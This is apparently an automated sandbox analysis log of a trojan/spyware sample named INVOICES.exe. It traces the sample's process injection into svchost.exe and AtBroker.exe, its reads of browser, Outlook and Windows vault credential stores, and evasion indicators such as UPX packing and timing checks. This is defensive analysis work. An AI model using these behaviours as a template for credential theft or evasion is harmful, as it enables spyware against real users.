Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047F0591
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0474C6E0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04730770
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04754750
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0472C7C0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047C2000
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047B8158
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047CA118
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04720100
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E81CC
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047F01AA
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047D0274
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047B02C0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EA352
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0473E3F0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047F03E6
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04730C00
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04720CF2
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047D0CB5
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047CCD1F
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0473AD00
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0472ADE0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04748DBF
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04730E59
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EEE26
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EEEDB
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04742E90
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047ECE93
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047A4F40
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04750F30
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047D2F30
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04772F28
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0473CFE0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04722FC8
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047AEFA0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0473A840
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04732840
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0475E8F0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047168B8
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04746962
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047329A0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047FA9A6
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0472EA80
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EAB40
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E6BD7
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04721460
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EF43F
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E7571
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047CD5B0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E16CC
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EF7B0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E70E9
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EF0E0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047DF0CC
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047370C0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0471F172
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047FB16B
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0476516C
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0473B1B0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047D12ED
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0474B2C0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047352A0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0471D34C
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E132D
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0477739A
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047A9C32
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EFCF2
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E7D73
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E1D5A
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04733D40
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0474FDC0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04739EB0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EFF09
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EFFB1
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04731F92
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0479D800
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047338E0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04739950
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0474B950
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047C5910
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047A3A6C
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EFA49
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047E7A46
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047DDAC6
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047CDAAC
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04775AA0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047D1AA3
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047EFB76
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047A5BF0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0476DBF9
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0474FB80
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00351F00
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0034CE37
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0034CE40
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0034D060
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0034B0E0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00341122
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00355540
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0035377B
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00353780
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0036BAC0
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_04445435
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0443E64C
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0443D718
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0443E194
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0443E2B3
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0443C944
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0444593D
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0443C9D8
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 04777E54 appears 102 times
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 047AF290 appears 105 times
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 0471B970 appears 280 times
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 04765130 appears 58 times
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 0479EA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 111 times
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: String function: 00737F41 appears 35 times
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: String function: 00750C63 appears 70 times
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: String function: 00758A80 appears 42 times
Source: INVOICES.exe, 00000000.00000003.1420002445.0000000003B4D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICES.exe
Source: INVOICES.exe, 00000000.00000003.1410165013.00000000039A3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs INVOICES.exe
Source: INVOICES.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@15/13
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0079A0F4 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007884F3 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00788AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0079B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007AEF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0079C423 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00734FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\INVOICES.exe | File created: C:\Users\user\AppData\Local\Temp\aut9E9.tmp
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\INVOICES.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: AtBroker.exe, 00000005.00000002.3876263575.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1879474595.00000000007AF000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1879309425.000000000078E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); (this is the password_notes table schema of a Chromium-based browser's Login Data SQLite store; its presence in AtBroker.exe memory shows the credential database was opened and read)
Source: INVOICES.exe | ReversingLabs: Detection: 47%
Source: unknown | Process created: C:\Users\user\Desktop\INVOICES.exe "C:\Users\user\Desktop\INVOICES.exe"
Source: C:\Users\user\Desktop\INVOICES.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INVOICES.exe"
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
Source: C:\Windows\SysWOW64\AtBroker.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\INVOICES.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\AtBroker.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32 (CLSID_CUrlHistory, the Internet Explorer URL history store)
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\AtBroker.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ (the Outlook 2013 profile store, where mail account settings and credentials are kept)
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: XORjEgwNIUb.exe, 00000004.00000002.3876547511.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3876353639.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ATBroker.pdb | source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: ATBroker.pdbGCTL | source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0085CA00 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_0073C590 push eax; retn 0073h | 0_2_0073C599
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00758AC5 push ecx; ret | 0_2_00758AD8
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00745524 push dword ptr [edi+00h]; retf | 0_2_0074552C
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BF808 push ds; ret | 0_2_007BF80A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417866 push FFFFFFD4h; iretd | 2_2_00417880
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D152 push edi; iretd | 2_2_0040D1EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403100 push eax; ret | 2_2_00403102
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D1DE push edi; iretd | 2_2_0040D1EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00405A8E push ds; ret | 2_2_00405A91
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408338 push ebx; retf | 2_2_0040833E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411BF6 push B5504480h; ret | 2_2_00411C05
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418C7F pushad ; iretd | 2_2_00418C8A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414C1D pushad ; ret | 2_2_00414C1E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040BC36 push edi; ret | 2_2_0040BC3B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041848E push eax; iretd | 2_2_004184AC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004156C1 push FFFFFFE6h; ret | 2_2_00415703
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418EB6 push edi; ret | 2_2_00418EB8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A7AE push cs; retf | 2_2_0041A7AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360225F pushad ; ret | 2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036027FA pushad ; ret | 2_2_036027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx | 2_2_036309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360283D push eax; iretd | 2_2_03602858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0360135F push eax; iretd | 2_2_03601369
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_047209AD push ecx; mov dword ptr [esp], ecx | 5_2_047209B6
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_003525BE push FFFFFFE6h; ret | 5_2_00352600
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00354763 push FFFFFFD4h; iretd | 5_2_0035477D
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0034298B push ds; ret | 5_2_0034298E
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0034EAF3 push B5504480h; ret | 5_2_0034EB02
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00348B33 push edi; ret | 5_2_00348B38
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_00345235 push ebx; retf | 5_2_0034523B
Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: 5_2_0035538B push eax; iretd | 5_2_003553A9
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00734A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00734A35
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007B53DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007B53DF
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00753307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00753307
                Source: C:\Users\user\Desktop\INVOICES.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\AtBroker.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\INVOICES.exe -- API/Special instruction interceptor: Address: 943214
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7AD324
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7AD7E4
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7AD944
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7AD504
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7AD544
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7AD1E4
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7B0154
Source: C:\Windows\SysWOW64\AtBroker.exe -- API/Special instruction interceptor: Address: 7FFBCB7ADA44
Source: C:\Windows\SysWOW64\svchost.exe -- Code function: 2_2_0367096E rdtsc -- 2_2_0367096E
Source: C:\Windows\SysWOW64\AtBroker.exe -- Window / User API: threadDelayed 9841
Source: C:\Users\user\Desktop\INVOICES.exe -- Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes -- graph_0-99105
